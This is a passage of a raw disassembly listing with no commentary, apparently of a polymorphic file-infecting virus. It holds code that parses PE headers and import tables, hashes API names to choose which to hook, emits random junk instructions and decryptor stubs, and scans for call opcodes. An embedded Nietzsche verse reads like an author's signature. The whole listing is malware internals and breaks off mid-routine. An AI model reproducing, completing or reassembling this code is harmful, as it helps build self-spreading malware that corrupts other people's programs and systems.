		dd 95FF5700h, 103E66h, 500CC483h, 7680BEBh, 8D000000h
		dd 101E98BDh, 0FF535700h, 103F3695h, 7EC08500h,	74B58D54h
		dd 8300103Fh, 101588A5h, 8D8D0000h, 104173h, 6ACE2Bh, 0FF535651h
		dd 103F3295h, 0F88300h,	8B912F7Eh, 74B58DFEh, 0B000103Fh
		dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
		dd 2BCF8BEAh, 74BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
		dd 103F26h, 156FBD80h, 74010010h, 7530682Ah, 95FF0000h
		dd 103ED6h, 4173BD80h, 74000010h, 6785C711h, 101Eh, 0C6000000h
		dd 10417385h, 8E90000h,	0C7FFFFFEh, 10157885h, 0
		dd 4C25D80h, 4F0A0D00h,	6F6F6E20h, 666F206Eh, 66696C20h
		dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
		dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
		dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
		dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
		dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
		dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
		dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
		dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
		dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
		dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h
		dd 10A61429h, 3AAB5957h, 606EF96Ah, 0C26CCC5Ch,	1Bh dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_31439404	proc near		; CODE XREF: sub_314394BA:loc_314394A8p
					; sub_3143950B+7p ...

arg_0		= dword	ptr  4

		pusha
		and	dword ptr [ebp+1042E4h], 0
		and	dword ptr [ebp+1042E8h], 0
		movzx	eax, word ptr [ebx+14h]
		lea	edx, [ebx+18h]
		movzx	ecx, word ptr [ebx+6]
		add	edx, eax


loc_31439420:				; CODE XREF: sub_31439404+41j
		mov	eax, [esp+20h+arg_0]
		sub	eax, [edx+0Ch]
		jb	short loc_31439442
		cmp	eax, [edx+8]
		jnb	short loc_31439442
		mov	eax, [edx+14h]
		sub	eax, [edx+0Ch]
		mov	[ebp+1042E4h], edx
		mov	[ebp+1042E8h], eax
		jmp	short loc_31439447
; ---------------------------------------------------------------------------


loc_31439442:				; CODE XREF: sub_31439404+23j
					; sub_31439404+28j
		add	edx, 28h
		loop	loc_31439420


loc_31439447:				; CODE XREF: sub_31439404+3Cj
		popa
		retn	4
sub_31439404	endp

; ---------------------------------------------------------------------------
		mov	[ebp+102457h], al
		call	sub_314394BA
		push	20h
		lea	eax, [ebp+102384h]
		pop	ecx


loc_31439462:				; CODE XREF: UPX2:31439469j
		cmp	[eax], ebx
		jz	short loc_31439472
		add	eax, 4
		loop	loc_31439462
		inc	dword ptr [ebp+1042C0h]
		retn
; ---------------------------------------------------------------------------


loc_31439472:				; CODE XREF: UPX2:31439464j
		neg	ecx
		add	ecx, [ebp+102457h]
		jecxz	short loc_3143948C


loc_3143947C:				; CODE XREF: UPX2:31439484j
		push	dword ptr [eax-4]
		pop	dword ptr [eax]
		sub	eax, 4
		loop	loc_3143947C
		mov	[ebp+102384h], ebx
; START	OF FUNCTION CHUNK FOR sub_314394BA


loc_3143948C:				; CODE XREF: UPX2:3143947Aj
					; sub_314394BA+34j
		cmp	dword ptr [edx], 0
		jz	short loc_31439496
		sub	esi, [edx]
		add	esi, [edx+10h]


loc_31439496:				; CODE XREF: sub_314394BA-2Bj
		lea	ecx, [esi-4]
		pop	eax
		pop	ebx
		pop	esi
		cmp	dword ptr [edx], 0
		jz	short loc_314394A5
		push	dword ptr [edx]
		jmp	short loc_314394A8
; ---------------------------------------------------------------------------


loc_314394A5:				; CODE XREF: sub_314394BA-1Bj
		push	dword ptr [edx+10h]


loc_314394A8:				; CODE XREF: sub_314394BA-17j
		call	sub_31439404
		sub	ecx, esi
		sub	ecx, [ebp+1042E8h]
		pop	eax
		add	ecx, [ebx+34h]
		retn
; END OF FUNCTION CHUNK	FOR sub_314394BA

; =============== S U B	R O U T	I N E =======================================



sub_314394BA	proc near		; CODE XREF: UPX2:31439451p

; FUNCTION CHUNK AT 3143948C SIZE 0000002E BYTES

		pop	dword ptr [ebp+1042C4h]
		mov	dword ptr [ebp+1042C0h], 0
		call	sub_3143950B
		mov	eax, [ebp+1042C0h]
		call	near ptr dword_31438B40+43h
		call	sub_314394F7
		cmp	dword ptr [ebp+1042C0h], 0
		jnz	short loc_314394F0
		mov	[ebp+102400h], ebx
		jmp	short loc_3143948C
; ---------------------------------------------------------------------------


loc_314394F0:				; CODE XREF: sub_314394BA+2Cj
		dec	dword ptr [ebp+1042C0h]
		retn
sub_314394BA	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_314394F7	proc near		; CODE XREF: sub_314394BA+20p
		pop	dword ptr [ebp+1042C4h]
		mov	[ebp+1042C0h], edx
		call	sub_3143950B
		xor	ecx, ecx
		retn
sub_314394F7	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_3143950B	proc near		; CODE XREF: sub_314394BA+10p
					; sub_314394F7+Cp ...

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

		mov	edx, [ebx+80h]
		push	edx
		call	sub_31439404
		add	edx, [ebp+1042E8h]
		add	edx, esi


loc_3143951F:				; CODE XREF: sub_3143950B+120j
		cmp	dword ptr [edx+0Ch], 0
		jz	locret_31439630
		cmp	dword ptr [edx+10h], 0
		jz	locret_31439630
		mov	eax, [edx+0Ch]
		push	eax
		call	sub_31439404
		add	eax, [ebp+1042E8h]
		add	eax, esi
		push	eax


loc_31439545:				; CODE XREF: sub_3143950B+47j
		mov	cl, [eax]
		cmp	cl, 0
		jz	short loc_31439565
		cmp	cl, 2Eh
		jz	short loc_31439554


loc_31439551:				; CODE XREF: sub_3143950B+58j
		inc	eax
		jmp	short loc_31439545
; ---------------------------------------------------------------------------


loc_31439554:				; CODE XREF: sub_3143950B+44j
		mov	ecx, [eax+1]
		and	ecx, 0DFDFDFDFh
		cmp	ecx, 4C4C44h
		jnz	short loc_31439551


loc_31439565:				; CODE XREF: sub_3143950B+3Fj
		pop	ecx
		sub	ecx, eax
		cmp	ecx, 0FFFFFFFAh
		jg	loc_31439628
		cmp	word ptr [eax-2], 3233h
		jnz	loc_31439628
		push	esi
		cmp	dword ptr [edx], 0
		jnz	short loc_31439588
		mov	ecx, [edx+10h]
		jmp	short loc_3143958A
; ---------------------------------------------------------------------------


loc_31439588:				; CODE XREF: sub_3143950B+76j
		mov	ecx, [edx]


loc_3143958A:				; CODE XREF: sub_3143950B+7Bj
		add	esi, ecx
		push	ecx
		call	sub_31439404
		add	esi, [ebp+1042E8h]


loc_31439598:				; CODE XREF: sub_3143950B+90j
					; sub_3143950B+117j
		lodsd
		test	eax, eax
		js	short loc_31439598
		jz	loc_31439627
		push	dword ptr [ebp+1042E8h]
		push	eax
		call	sub_31439404
		add	eax, [ebp+1042E8h]
		pop	dword ptr [ebp+1042E8h]
		add	eax, [esp+4+var_4]
		push	ebx
		add	eax, 2
		xor	ebx, ebx


loc_314395C4:				; CODE XREF: sub_3143950B+CEj
		movzx	ecx, byte ptr [eax]
		jecxz	short loc_314395DB
		or	cl, 20h
		push	ebx
		shl	[esp+0Ch+var_C], 4
		sub	[esp+0Ch+var_C], ebx
		sub	[esp+0Ch+var_C], ecx
		pop	ebx
		inc	eax
		jmp	short loc_314395C4
; ---------------------------------------------------------------------------


loc_314395DB:				; CODE XREF: sub_3143950B+BCj
		cmp	ebx, 0DDBBD70Fh
		jz	short loc_31439621
		cmp	ebx, 0DB6E45A8h
		jz	short loc_31439621
		cmp	ebx, 0FFA13B59h
		jz	short loc_31439621
		cmp	ebx, 0ACB522D6h
		jz	short loc_31439621
		cmp	ebx, 0F358E993h
		jz	short loc_31439621
		cmp	ebx, 0F358E97Dh
		jz	short loc_31439621
		cmp	ebx, 0E1253F46h
		jz	short loc_31439621
		cmp	ebx, 0E1253F30h
		jz	short loc_31439621
		call	dword ptr [ebp+1042C4h]


loc_31439621:				; CODE XREF: sub_3143950B+D6j
					; sub_3143950B+DEj ...
		pop	ebx
		jmp	loc_31439598
; ---------------------------------------------------------------------------


loc_31439627:				; CODE XREF: sub_3143950B+92j
		pop	esi


loc_31439628:				; CODE XREF: sub_3143950B+60j
					; sub_3143950B+6Cj
		add	edx, 14h
		jmp	loc_3143951F
; ---------------------------------------------------------------------------

locret_31439630:			; CODE XREF: sub_3143950B+18j
					; sub_3143950B+22j
		retn
sub_3143950B	endp

; ---------------------------------------------------------------------------
		align 2
		dw 46Ah
		dd 0F549E858h, 9588FFFFh, 102631h, 1831B866h, 0E4C0E202h
		dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
		dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 31850250h, 0AA001026h
		dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
		dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
		dd 0C3BFE2ABh, 39BC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039B085h
		dd 0
; ---------------------------------------------------------------------------
		adc	[edi], cl
		xchg	eax, ebp
		rol	cl, 0E0h
		or	esi, esi
		test	[esi+1001039h],	ebp
		jnz	short loc_314396C6
		or	ax, 2589h
		jmp	short loc_314396D9
; ---------------------------------------------------------------------------


loc_314396C6:				; CODE XREF: UPX2:314396BEj
		test	byte ptr [ebp+1039AEh],	2
		jnz	short loc_314396D5
		or	ax, 2531h
		jmp	short loc_314396D9
; ---------------------------------------------------------------------------


loc_314396D5:				; CODE XREF: UPX2:314396CDj
		or	ax, 2501h


loc_314396D9:				; CODE XREF: UPX2:314396C4j
					; UPX2:314396D3j
		stosw
		call	near ptr dword_31439634+68h
		mov	eax, [ebx+34h]
		mov	[ebp+1042D8h], edx
		stosd
		retn

; =============== S U B	R O U T	I N E =======================================



sub_314396EB	proc near		; CODE XREF: UPX2:31439D37p
		test	dword ptr [ebp+1039B0h], 10000000h
		setnz	al
		add	al, 0BCh
		stosb
		call	near ptr dword_31439634+68h
		mov	[ebp+1042DCh], edx
		test	byte ptr [ebp+1039AEh],	1
		jnz	short loc_31439713
		rdtsc
		jmp	short loc_31439715
; ---------------------------------------------------------------------------


loc_31439713:				; CODE XREF: sub_314396EB+22j
		sub	eax, eax


loc_31439715:				; CODE XREF: sub_314396EB+26j
		stosd
		retn
sub_314396EB	endp


; =============== S U B	R O U T	I N E =======================================



sub_31439717	proc near		; CODE XREF: UPX2:loc_31439D41p
		test	dword ptr [ebp+1039B0h], 10000000h
		jz	short loc_3143974A
		mov	al, [ebp+1039AAh]
		shl	eax, 0Bh
		or	ax, 458Bh
		stosw
		mov	al, 0F8h
		stosb
		mov	al, [ebp+1039AAh]
		shl	eax, 1Bh
		add	eax, 6896467h
		stosd
		xor	eax, eax
		stosw
		jmp	short locret_3143975C
; ---------------------------------------------------------------------------


loc_3143974A:				; CODE XREF: sub_31439717+Aj
		mov	eax, 58F64h
		stosd
		mov	al, [ebp+1039AAh]
		add	al, 58h
		shl	eax, 18h
		stosd

locret_3143975C:			; CODE XREF: sub_31439717+31j
		retn
sub_31439717	endp


; =============== S U B	R O U T	I N E =======================================



sub_3143975D	proc near		; CODE XREF: sub_314397CF:loc_314397F6p
					; sub_314397CF+4Cp ...
		mov	byte ptr [ebp+10278Ch],	9
		jmp	short loc_3143978B
; ---------------------------------------------------------------------------


loc_31439766:				; CODE XREF: sub_3143975D+44j
		mov	al, 0FCh
		jmp	short loc_3143978A
; ---------------------------------------------------------------------------


loc_3143976A:				; CODE XREF: sub_3143975D+48j
		mov	ax, 0EBh
		stosw
		jmp	short loc_3143978B
; ---------------------------------------------------------------------------


loc_31439772:				; CODE XREF: sub_3143975D+4Cj
		push	4
		pop	eax
		call	near ptr dword_31438B40+43h
		lea	eax, [edx+edx*8]
		shl	eax, 8
		add	ax, 0C089h
		stosw
		jmp	short loc_3143978B
; ---------------------------------------------------------------------------


loc_31439788:				; CODE XREF: sub_3143975D+50j
		mov	al, 90h


loc_3143978A:				; CODE XREF: sub_3143975D+Bj
					; sub_3143975D+60j ...
		stosb


loc_3143978B:				; CODE XREF: sub_3143975D+7j
					; sub_3143975D+13j ...
		push	15h
		pop	eax
		call	near ptr dword_31438B40+43h
		add	byte ptr [ebp+10278Ch],	6
		cmp	dl, 8
		jnb	short locret_314397CE
		test	dl, dl
		jz	short loc_31439766
		dec	dl
		jz	short loc_3143976A
		dec	dl
		jz	short loc_31439772
		dec	dl
		jz	short loc_31439788
		dec	dl
		jz	short loc_314397BF
		dec	dl
		jz	short loc_314397C6
		dec	dl
		jz	short loc_314397CA
		mov	al, 0F9h
		jmp	short loc_3143978A
; ---------------------------------------------------------------------------


loc_314397BF:				; CODE XREF: sub_3143975D+54j
		mov	al, 87h
		stosb
		mov	al, 0DBh
		jmp	short loc_3143978A
; ---------------------------------------------------------------------------


loc_314397C6:				; CODE XREF: sub_3143975D+58j
		mov	al, 0F5h
		jmp	short loc_3143978A
; ---------------------------------------------------------------------------


loc_314397CA:				; CODE XREF: sub_3143975D+5Cj
		mov	al, 0F8h
		jmp	short loc_3143978A
; ---------------------------------------------------------------------------

locret_314397CE:			; CODE XREF: sub_3143975D+40j
		retn
sub_3143975D	endp


; =============== S U B	R O U T	I N E =======================================



sub_314397CF	proc near		; CODE XREF: UPX2:loc_31439C18p
					; UPX2:31439DCBp
		test	dword ptr [ebp+1039B0h], 2000h
		mov	al, 86h
		jnz	short loc_314397DF
		add	al, 4


loc_314397DF:				; CODE XREF: sub_314397CF+Cj
		lea	ecx, [edi-2]
		mov	ah, [ebp+1039A8h]
		stosw
		cmp	ah, 5
		jnz	short loc_314397F6
		mov	al, 0
		or	byte ptr [edi-1], 40h
		stosb


loc_314397F6:				; CODE XREF: sub_314397CF+1Ej
		call	sub_3143975D
		test	dword ptr [ebp+1039B0h], 4000h
		mov	ax, 3166h
		jnz	short loc_3143980D
		mov	ah, 29h


loc_3143980D:				; CODE XREF: sub_314397CF+3Aj
		stosw
		mov	al, 18h
		or	al, [ebp+1039AAh]
		shl	al, 3
		stosb
		call	sub_3143975D
		mov	al, 88h
		test	dword ptr [ebp+1039B0h], 8000h
		jnz	short loc_31439830
		mov	al, 86h


loc_31439830:				; CODE XREF: sub_314397CF+5Dj
		mov	ah, [ebp+1039A8h]
		stosw
		cmp	ah, 5
		jnz	short locret_31439844
		mov	al, 0
		or	byte ptr [edi-1], 40h
		stosb

locret_31439844:			; CODE XREF: sub_314397CF+6Cj
		retn
sub_314397CF	endp

; ---------------------------------------------------------------------------


loc_31439845:				; CODE XREF: sub_3143A44B+183p
		lea	edi, [ebp+1039BCh]
		call	sub_3143975D
		test	dword ptr [ebp+1039B0h], 400000h
		jz	short near ptr unk_3143985F
		mov	al, 60h
		stosb
; ---------------------------------------------------------------------------
unk_3143985F	db 0F7h	; 		; CODE XREF: UPX2:3143985Aj
		db  85h	; 
		db 0B0h	; 
		db  39h	; 9
		db  10h
		db    0
		db    0
		db    0
		db    0
; ---------------------------------------------------------------------------
		adc	[edi+eax-48h], dh
		push	ebp
		mov	ebp, esp
		add	[ebx-4F7A08B1h], ch
		cmp	[eax], edx
		add	[ebx], al
; ---------------------------------------------------------------------------
		db 2 dup(0), 2
		dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042C8h, 0FFFECCE8h
		dd 0AAE8B0FFh, 0CCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39B085F7h
		dd 30010h, 1A740000h, 39B085F7h, 10h, 0A740200h, 0FFFE2EE8h
		dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042C8h, 0C82BCF8Bh
		dd 42D0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
		dd 1039B085h, 300h, 0F6137400h,	1039AE85h, 0A748000h, 0FFFDAAE8h
		dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39B085F7h
		dd 30010h, 5A740000h, 39AE85F6h, 75800010h, 0FD81E80Ah
		dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
		dd 0FFB86639h, 91AB6615h, 0B0958BABh, 0F7001039h, 3C2F7D2h
		dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
		dd 91AB6615h, 8BCF8BABh, 1042D085h, 89C82B00h, 85F7FC48h
		dd 1039B0h, 3, 85F73874h, 1039B0h, 0C000000h, 85F72C74h
		dd 1039B0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
		dd 39B085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
		dd 1039B0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
		dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039B0h
		dd 8, 0BD807275h, 1039AEh, 0E8697400h, 0FFFFFD65h, 291829B8h
		dd 0AAA50AC9h, 0C0001039h, 0A50A03E4h, 1039AAh,	0FD4BE8ABh
		dd 0B1B0FFFFh, 0AE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
		dd 1039AAh, 4C0048Dh, 8E0C140h,	0AB668DB0h, 57AA01B0h
		dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0B085F759h, 10001039h
		dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
		dd 0AAE8B0FFh, 89ABC033h, 1042B4BDh, 0B085F700h, 20001039h
		dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039B085h, 0
		dd 89187480h, 1042E0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
		dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh,	1039A8h
		dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0B085F7C0h, 40001039h
		dd 74000000h, 28C48003h, 39A8A50Ah, 0AB660010h,	42B8BD89h
		dd 0F7AB0010h, 1039B085h, 0
; ---------------------------------------------------------------------------
		inc	eax
		jnz	short loc_31439AF0
		mov	al, 50h
		add	al, [ebp+1039A8h]
		stosb


loc_31439AF0:				; CODE XREF: UPX2:31439AE5j
		test	dword ptr [ebp+1039B0h], 80h
		jnz	short loc_31439B07
		mov	al, 0B8h
		or	al, [ebp+1039A9h]
		stosb
		jmp	short loc_31439B44
; ---------------------------------------------------------------------------


loc_31439B07:				; CODE XREF: UPX2:31439AFAj
		mov	ax, 1831h
		test	dword ptr [ebp+1039B0h], 100h
		jz	short loc_31439B19
		mov	al, 29h


loc_31439B19:				; CODE XREF: UPX2:31439B15j
		or	ah, [ebp+1039A9h]
		shl	ah, 3
		or	ah, [ebp+1039A9h]
		stosw
		mov	ax, 0F081h
		test	dword ptr [ebp+1039B0h], 200h
		jnz	short loc_31439B3C
		mov	ah, 0C8h


loc_31439B3C:				; CODE XREF: UPX2:31439B38j
		or	ah, [ebp+1039A9h]
		stosw


loc_31439B44:				; CODE XREF: UPX2:31439B05j
		mov	[ebp+1042D4h], edi
		mov	eax, 29BCh
		stosd
		test	dword ptr [ebp+1039B0h], 8
		jz	short loc_31439BCD
		call	sub_3143975D
		test	dword ptr [ebp+1039B0h], 400h
		jnz	short loc_31439B78
		mov	al, 0B8h
		or	al, [ebp+1039AAh]
		stosb
		jmp	short loc_31439BC5
; ---------------------------------------------------------------------------


loc_31439B78:				; CODE XREF: UPX2:31439B6Bj
		test	dword ptr [ebp+1039B0h], 800h
		jnz	short loc_31439B95
		mov	ax, 0E083h
		or	ah, [ebp+1039AAh]
		stosw
		xor	eax, eax
		stosb
		jmp	short loc_31439BAA
; ---------------------------------------------------------------------------


loc_31439B95:				; CODE XREF: UPX2:31439B82j
		mov	ax, 1829h
		or	ah, [ebp+1039AAh]
		shl	ah, 3
		or	ah, [ebp+1039AAh]
		stosw


loc_31439BAA:				; CODE XREF: UPX2:31439B93j
		test	dword ptr [ebp+1039B0h], 1000h
		mov	ax, 0C081h
		jz	short loc_31439BBD
		add	ah, 8


loc_31439BBD:				; CODE XREF: UPX2:31439BB8j
		or	ah, [ebp+1039AAh]
		stosw


loc_31439BC5:				; CODE XREF: UPX2:31439B76j
		movzx	eax, byte ptr [ebp+1039AEh]
		stosd


loc_31439BCD:				; CODE XREF: UPX2:31439B5Aj
		call	sub_3143975D
		test	dword ptr [ebp+1039B0h], 40000000h
		jz	short loc_31439BEC
		mov	al, 50h
		add	al, [ebp+1039A8h]
		stosb
		call	sub_3143975D


loc_31439BEC:				; CODE XREF: UPX2:31439BDCj
		lea	ecx, [edi-2]
		mov	[ebp+1042BCh], ecx
		test	dword ptr [ebp+1039B0h], 80000000h
		jz	short loc_31439C18
		mov	al, 0E8h
		stosb
		mov	eax, [ebp+1042E0h]
		sub	eax, edi
		sub	eax, 4
		stosd
		mov	[ebp+1042E0h], edi
		jmp	short loc_31439C1D
; ---------------------------------------------------------------------------


loc_31439C18:				; CODE XREF: UPX2:31439BFFj
		call	sub_314397CF


loc_31439C1D:				; CODE XREF: UPX2:31439C16j
		call	sub_3143975D
		test	dword ptr [ebp+1039B0h], 10000h
		jnz	short loc_31439C39
		mov	al, 40h
		or	al, [ebp+1039A8h]
		stosb
		jmp	short loc_31439C48
; ---------------------------------------------------------------------------


loc_31439C39:				; CODE XREF: UPX2:31439C2Cj
		mov	ax, 0C083h
		or	ah, [ebp+1039A8h]
		stosw
		mov	al, 1
		stosb


loc_31439C48:				; CODE XREF: UPX2:31439C37j
		test	dword ptr [ebp+1039B0h], 20000h
		jnz	short loc_31439C83
		test	dword ptr [ebp+1039B0h], 40000h
		jnz	short loc_31439C7A
		mov	al, 0C0h
		or	al, [ebp+1039AAh]
		mov	ah, [ebp+1039AFh]
		shl	eax, 10h
		mov	ax, 8166h
		stosd
		mov	al, 0
		jmp	short loc_31439C82
; ---------------------------------------------------------------------------


loc_31439C7A:				; CODE XREF: UPX2:31439C5Ej
		mov	al, 40h
		or	al, [ebp+1039AAh]


loc_31439C82:				; CODE XREF: UPX2:31439C78j
		stosb


loc_31439C83:				; CODE XREF: UPX2:31439C52j
		test	dword ptr [ebp+1039B0h], 80000h
		jnz	short loc_31439C9F
		mov	ax, 0E883h
		or	ah, [ebp+1039A9h]
		stosw
		mov	al, 1
		jmp	short loc_31439CA7
; ---------------------------------------------------------------------------


loc_31439C9F:				; CODE XREF: UPX2:31439C8Dj
		mov	al, 48h
		or	al, [ebp+1039A9h]


loc_31439CA7:				; CODE XREF: UPX2:31439C9Dj
		stosb
		call	sub_3143975D
		test	dword ptr [ebp+1039B0h], 100000h
		mov	cl, 75h
		jnz	short loc_31439CE0
		mov	ax, 0F883h
		or	ah, [ebp+1039A9h]
		stosw
		xor	eax, eax
		stosb
		sub	[ebp+1042BCh], edi
		test	dword ptr [ebp+1039B0h], 200000h
		jnz	short loc_31439CFB
		mov	cl, 77h
		jmp	short loc_31439CFB
; ---------------------------------------------------------------------------


loc_31439CE0:				; CODE XREF: UPX2:31439CB9j
		mov	ax, 1809h
		or	ah, [ebp+1039A9h]
		shl	ah, 3
		or	ah, [ebp+1039A9h]
		stosw
		sub	[ebp+1042BCh], edi


loc_31439CFB:				; CODE XREF: UPX2:31439CDAj
					; UPX2:31439CDEj
		mov	al, cl
		mov	ah, [ebp+1042BCh]
		stosw
		mov	al, 58h
		add	al, [ebp+1039A8h]
		stosb
		call	sub_3143975D
		test	dword ptr [ebp+1039B0h], 2000003h
		jz	short loc_31439D4B
		test	dword ptr [ebp+1039B0h], 8000000h
		jnz	short loc_31439D4B
		test	dword ptr [ebp+1039B0h], 6000000h
		jnz	short loc_31439D41
		call	sub_314396EB
		call	sub_3143975D


loc_31439D41:				; CODE XREF: UPX2:31439D35j
		call	sub_31439717
		call	sub_3143975D


loc_31439D4B:				; CODE XREF: UPX2:31439D1Dj
					; UPX2:31439D29j
		test	dword ptr [ebp+1039B0h], 10000000h
		jz	short loc_31439D5F
		mov	al, 0C9h
		stosb
		call	sub_3143975D


loc_31439D5F:				; CODE XREF: UPX2:31439D55j
		test	dword ptr [ebp+1039B0h], 400000h
		jz	short loc_31439D95
		mov	al, 7
		sub	al, [ebp+1039A8h]
		shl	eax, 1Ah
		or	eax, 240889h
		add	ah, [ebp+1039A8h]
		shl	ah, 3
		add	ah, 4
		stosd
		call	sub_3143975D
		mov	al, 61h
		stosb
		call	sub_3143975D


loc_31439D95:				; CODE XREF: UPX2:31439D69j
		mov	ax, 0E0FFh
		or	ah, [ebp+1039A8h]
		stosw
		call	sub_3143975D
		test	dword ptr [ebp+1039B0h], 20h
		jz	short loc_31439E21
		test	dword ptr [ebp+1039B0h], 80000000h
		jz	short loc_31439DDD
		mov	eax, edi
		mov	ecx, [ebp+1042E0h]
		sub	eax, ecx
		mov	[ecx-4], eax
		call	sub_314397CF
		call	sub_3143975D
		mov	al, 0C3h
		stosb
		call	sub_3143975D


loc_31439DDD:				; CODE XREF: UPX2:31439DBCj
		mov	eax, edi
		mov	ecx, [ebp+1042B4h]
		sub	eax, ecx
		mov	[ecx-4], eax
		mov	al, 58h
		or	al, [ebp+1039A8h]
		stosb
		call	sub_3143975D
		test	dword ptr [ebp+1039B0h], 800000h
		jz	short loc_31439E10
		mov	ax, 0C350h
		or	al, [ebp+1039A8h]
		jmp	short loc_31439E1A
; ---------------------------------------------------------------------------


loc_31439E10:				; CODE XREF: UPX2:31439E02j
		mov	ax, 0E0FFh
		or	ah, [ebp+1039A8h]


loc_31439E1A:				; CODE XREF: UPX2:31439E0Ej
		stosw
		call	sub_3143975D


loc_31439E21:				; CODE XREF: UPX2:31439DB0j
		test	dword ptr [ebp+1039B0h], 2000003h
		jz	short loc_31439E8C
		mov	ecx, edi
		mov	eax, [ebp+1042CCh]
		sub	ecx, eax
		mov	[eax-4], ecx
		xor	ecx, ecx
		test	dword ptr [ebp+1039B0h], 1000000h
		jnz	short loc_31439E56
		lea	eax, [ebp+1039A8h]


loc_31439E4E:				; CODE XREF: UPX2:31439E54j
		mov	cl, [eax]
		inc	eax
		cmp	cl, 3
		jnb	short loc_31439E4E


loc_31439E56:				; CODE XREF: UPX2:31439E46j
		lea	eax, ds:102444h[ecx*8]
		shl	eax, 8
		mov	al, 8Bh
		stosd
		jecxz	short loc_31439E6B
		mov	ax, 0C031h
		stosw


loc_31439E6B:				; CODE XREF: UPX2:31439E63j
		mov	ax, 808Fh
		push	0B8h
		add	ah, cl
		stosw
		pop	eax
		stosd
		test	ecx, ecx
		jnz	short loc_31439E84
		mov	ax, 0C031h
		stosw


loc_31439E84:				; CODE XREF: UPX2:31439E7Cj
		mov	al, 0C3h
		stosb
		call	sub_3143975D


loc_31439E8C:				; CODE XREF: UPX2:31439E2Bj
		lea	eax, [ebp+1039BCh]
		test	dword ptr [ebp+1039B0h], 20000000h
		jnz	short loc_31439EA4
		push	edi
		sub	edi, eax
		pop	eax
		jmp	short loc_31439EBD
; ---------------------------------------------------------------------------


loc_31439EA4:				; CODE XREF: UPX2:31439E9Cj
		mov	edx, [ebx+28h]
		sub	edi, eax
		sub	edx, eax
		mov	ecx, [ebp+1042D4h]
		add	[ebp+1042B4h], edx
		add	[ecx], edi
		mov	eax, [esp+4]


loc_31439EBD:				; CODE XREF: UPX2:31439EA2j
		mov	[ebp+101069h], edi
		mov	edi, [ebp+1042B8h]
		sub	eax, [ebp+1042B4h]
		test	dword ptr [ebp+1039B0h], 40h
		jz	short loc_31439EDD
		neg	eax


loc_31439EDD:				; CODE XREF: UPX2:31439ED9j
		stosd
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_31439EE1	proc near		; CODE XREF: sub_3143A44B+336p
		push	esi
		push	edi
		cmp	dword ptr [ebp+1042F0h], 0
		jz	loc_3143A0C9
		call	near ptr loc_31439F01+1
		dec	ebx
		inc	ebp
		push	edx
		dec	esi
		inc	ebp
		dec	esp
		xor	esi, [edx]
		db	2Eh
		inc	esp
		dec	esp
		dec	esp


loc_31439F01:				; CODE XREF: sub_31439EE1+Fp
		add	bh, bh
sub_31439EE1	endp ; sp-analysis failed

		xchg	eax, ebp
		sahf
		db	3Eh
		adc	[eax], al
		mov	[ebp+104304h], eax
		push	ebx
		mov	ebx, [eax+3Ch]
		add	ebx, eax
		push	dword ptr [ebx+28h]
		mov	eax, [ebx+34h]
		call	sub_31439404
		mov	edx, [ebp+1042E4h]
		pop	ebx
		add	eax, [edx+0Ch]
		mov	[ebp+104308h], eax
		add	eax, [edx+8]
		mov	[ebp+10430Ch], eax
		mov	esi, [ebx+28h]
		push	dword ptr [ebx+80h]
		call	sub_31439404
		mov	edi, [ebp+1042E4h]
		push	esi
		call	sub_31439404
		mov	edx, [ebp+1042E4h]
		mov	ecx, [edx+8]
		add	ecx, [edx+0Ch]
		sub	ecx, esi
		sub	ecx, 5
		js	loc_3143A0C9
		jz	loc_3143A0C9
		add	esi, [ebp+1042E8h]
		add	esi, [ebp+1042A4h]
; START	OF FUNCTION CHUNK FOR sub_3143A09A


loc_31439F7B:				; CODE XREF: sub_3143A09A+29j
		lodsb
		cmp	al, 0E8h
		jnz	loc_3143A026
		lea	eax, [esi+4]
		sub	eax, [ebp+1042A4h]
		add	eax, [esi]
		push	eax
		call	sub_31439404
